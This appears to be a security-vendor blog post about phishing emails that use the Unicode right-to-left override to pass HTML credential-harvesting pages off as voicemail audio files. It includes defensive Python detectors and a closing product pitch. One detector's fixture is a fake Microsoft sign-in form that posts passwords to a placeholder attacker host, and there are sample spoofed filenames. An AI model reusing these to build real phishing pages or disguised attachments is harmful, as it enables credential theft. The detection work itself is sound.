20 Year-Old “Right-to-Left Override” Functionality Used in Attacks to Trick Microsoft 365 Users Out of Credentials

Long used to disguise malicious file extensions, this legacy Unicode feature is being repurposed in attacks to hide the real type of an email attachment and steal Microsoft 365 credentials.

Some languages (Hebrew and Arabic, for example) are written right-to-left, as opposed to most languages (including English), which are written left-to-right. To let both directions coexist in one string, Unicode defined a set of non-printing directional control characters years ago. One of them, U+202E, is the "right-to-left override", better known as RLO: every character that follows it is displayed in reverse order, regardless of the script.

For example, writing the phrase "Cyber[U+202E]Security" displays as "CyberytiruceS": everything after the override is shown backwards. Now apply that to a malicious filename. A file actually named "MaliciousAttachment[U+202E]fdp.exe" is displayed in Windows as "MaliciousAttachmentexe.pdf", but its real extension is still .exe, and Windows will run it as an executable when it is double-clicked. You can quickly see how this turns a file that is obviously suspicious into one that appears benign and even business-appropriate.

In a new attack documented by security vendor Vade Secure, this combination of obfuscation and social engineering has recently been seen in the wild targeting Microsoft 365 users. Victims receive an email with a purported "voice mail" attached, and the displayed filename ends in "mth.mp3". Now remember the RLO principle: the characters after the override are shown reversed, so what looks like an .mp3 audio file is really a file whose name ends in ".htm" (the stored characters "3pm.htm", displayed backwards). It is an HTML file, not audio. When the attachment is opened it loads in the browser and the user is presented with a Microsoft 365 logon screen:
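The following is an added example, not code from the original post or from Vade Secure. It models the RLO rendering described above and reports, for a list of attachment names, the extension the user sees versus the extension the operating system will act on. The renderer is a deliberate simplification of the Unicode bidirectional algorithm (text after U+202E is shown reversed until a U+202C or the end of the string), which is enough to reproduce how Explorer and mail clients display these spoofed names. All sample filenames are constructed placeholders.

```python
"""
Reveal the displayed vs. actual extension of filenames that contain a
Unicode right-to-left override (RLO, U+202E) or other bidi controls.

Added example; not code from the original post or from Vade Secure.
The renderer is a simplification of UAX #9: text between U+202E and the
next U+202C (or end of string) is shown reversed, controls are invisible.
"""
import os

RLO = "\u202e"   # RIGHT-TO-LEFT OVERRIDE
PDF = "\u202c"   # POP DIRECTIONAL FORMATTING: ends an override

# Bidi control characters that have no legitimate place in an attachment name.
BIDI_CONTROLS = frozenset(
    "\u202a\u202b\u202c\u202d\u202e"   # LRE, RLE, PDF, LRO, RLO
    "\u2066\u2067\u2068\u2069"         # LRI, RLI, FSI, PDI
    "\u200e\u200f"                     # LRM, RLM
)


def displayed_name(name: str) -> str:
    """Approximate what a user sees: control characters are invisible and
    everything between an RLO and the next PDF (or end of string) is reversed."""
    out = []
    i = 0
    while i < len(name):
        ch = name[i]
        if ch == RLO:
            end = name.find(PDF, i + 1)
            if end == -1:
                end = len(name)
            segment = "".join(c for c in name[i + 1:end] if c not in BIDI_CONTROLS)
            out.append(segment[::-1])
            i = end + 1          # skip the PDF too (harmless past end of string)
        elif ch in BIDI_CONTROLS:
            i += 1               # other controls: invisible, ignore
        else:
            out.append(ch)
            i += 1
    return "".join(out)


def analyze(name: str) -> dict:
    """Compare the extension the OS will act on with the one the user sees."""
    shown = displayed_name(name)
    actual_ext = os.path.splitext(name)[1].lower()
    shown_ext = os.path.splitext(shown)[1].lower()
    return {
        "name": name,
        "displayed": shown,
        "has_bidi": any(c in BIDI_CONTROLS for c in name),
        "actual_ext": actual_ext,
        "displayed_ext": shown_ext,
        "mismatch": actual_ext != shown_ext,
    }


def flag_attachments(names):
    """Return the filenames a mail gateway should quarantine. Any bidi control
    character in an attachment name is suspicious on its own; an extension
    mismatch is the attack described in the post."""
    return [n for n in names if analyze(n)["has_bidi"]]


# Constructed sample attachment names (placeholders, not real samples).
SAMPLE_FILENAMES = [
    "MaliciousAttachment" + RLO + "fdp.exe",   # shown as ...exe.pdf, runs as .exe
    "Voice_Message_0417" + RLO + "3pm.htm",    # shown as ...mth.mp3, opens as HTML
    "quarterly_report.pdf",                     # benign
    "invoice\u200f.pdf",                        # RLM mark only: no spoofing, still flag it
]

if __name__ == "__main__":
    for n in SAMPLE_FILENAMES:
        r = analyze(n)
        print(f"{r['displayed']!r:40} actual={r['actual_ext']:6} "
              f"shown={r['displayed_ext']:6} bidi={r['has_bidi']} mismatch={r['mismatch']}")
```

`flag_attachments` deliberately keys on the presence of any directional control rather than only on a mismatch: legitimate business attachments do not carry U+202E in their names, so blocking or rewriting such names at the gateway is cheaper and more robust than trying to predict exactly how each client will render them.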

[Image: the Microsoft 365 sign-in page rendered by the HTML attachment. Source: Vade Secure]

Behind the scenes, the HTML contains a sign-in form whose action POSTs whatever the victim types to a server controlled by the attackers, so the credentials entered into the fake logon page end up in the attackers' hands.
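As an added example (not code from the original post or from Vade Secure), the check below is what a mail gateway or analyst script can run over an HTML attachment to spot exactly this pattern: a form containing a password field that POSTs to a remote host. The sample HTML is constructed for illustration and the host names in it are placeholders.

```python
"""
Flag HTML attachments that carry a credential-harvesting form, i.e. a form
with a password input that POSTs to a remote host.

Added example, not code from the original post or from Vade Secure.
SAMPLE_HTML is constructed; "collect.attacker.example" is a placeholder.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: Microsoft-branded sign-in page whose form posts elsewhere.
SAMPLE_HTML = """<html><body>
<img src="https://login.microsoftonline.com/favicon.ico" alt="Microsoft">
<form method="POST" action="https://collect.attacker.example/post.php">
  <input type="email" name="login" placeholder="Email, phone, or Skype">
  <input type="password" name="passwd" placeholder="Password">
  <input type="submit" value="Sign in">
</form>
</body></html>"""


class FormScanner(HTMLParser):
    """Collect every <form> with its method, action and whether it has a password input."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._form = None

    def handle_starttag(self, tag, attrs):
        # HTMLParser already lowercases tag and attribute names; values may be None.
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self._form = {
                "action": a.get("action", ""),
                "method": a.get("method", "get").lower(),   # HTML default is GET
                "has_password": False,
            }
            self.forms.append(self._form)
        elif tag == "input" and self._form is not None:
            if a.get("type", "").lower() == "password":
                self._form["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def harvesting_targets(html: str):
    """Return the hosts that would receive a POSTed password from this document.
    A local HTML attachment has no business submitting a password anywhere,
    so any hit is grounds to quarantine the message."""
    scanner = FormScanner()
    scanner.feed(html)
    scanner.close()
    targets = []
    for form in scanner.forms:
        if form["has_password"] and form["method"] == "post":
            targets.append(urlparse(form["action"]).hostname or "(relative URL)")
    return targets


def is_credential_harvester(html: str) -> bool:
    return bool(harvesting_targets(html))


if __name__ == "__main__":
    print("POST targets for password:", harvesting_targets(SAMPLE_HTML))
```

This catches the plain HTML-form variant the post describes. A page that submits credentials with JavaScript (fetch or XMLHttpRequest) has no `<form>` to parse, so a gateway policy that quarantines or strips .htm/.html attachments outright is the more reliable control; the parser above is a useful triage signal, not a complete detector.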

The big red flag here is receiving a voicemail as an email attachment at all. Users who have undergone security awareness training will spot this immediately, or at the very least find it suspicious, and proper training tells them not to open such content, which keeps them from becoming victims of these attacks.

Find out which of your users' emails are exposed before bad actors do.

Many of the email addresses and identities of your organization are exposed on the internet and easy to find for cybercriminals. With that email attack surface, they can launch social engineering, spear phishing and ransomware attacks on your organization. KnowBe4's Email Exposure Check Pro (EEC) identifies the at-risk users in your organization by crawling business social media information and now thousands of breach databases.

Here's how it works:

  • The first stage does deep web searches to find any publicly available organizational data
  • The second stage finds any users that have had their account information exposed in any of several thousand breaches
  • You will get a summary report PDF as well as a link to the full detailed report
  • Results in minutes!
